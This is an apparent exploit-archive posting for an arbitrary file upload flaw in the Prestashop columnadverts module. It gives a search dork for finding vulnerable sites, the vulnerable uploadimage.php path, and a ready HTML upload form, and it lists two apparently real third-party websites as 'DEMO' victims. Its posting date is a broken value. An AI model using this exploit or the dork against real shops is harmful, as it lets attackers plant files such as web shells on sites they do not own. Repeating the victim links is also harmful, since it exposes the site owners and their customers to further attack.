Prestashop columnadverts module Arbitrary File Upload

Posted on 30 November -0001
<HTML><HEAD><TITLE>Prestashop columnadverts module Arbitrary File Upload</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>##############################################################
> Exploit Title: Prestashop Arbitrary File Upload
> Exploit Author: HxN | facebook.com/CowoKerensTeam
> Dork : inurl:"/modules/columnadverts2/" or inurl:"/modules/columnadverts/"
> Website : https://www.prestashop.com/
> Date : 2016/08/21
> Tested on : Ubuntu , Win 8

############################################################
POC :

target.il/modules/columnadverts2/uploadimage.php

target.il/modules/columnadverts2/uploadimage.php

Vuln : "error"


##############################################################
CSRF :

 <form method="POST" action="target.il/modules/namemodule/uploadimage.php"
  enctype="multipart/form-data">
 <input type="file" name="userfile" /><button>Upload</button>
 </form>


###############################################################
> DEMO :

> http://www.rossoregale.com/modules/homepageadvertise2/slides/id.htm
> http://orita.es/modules/homepageadvertise2/slides/id.htm

##############################################################</BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20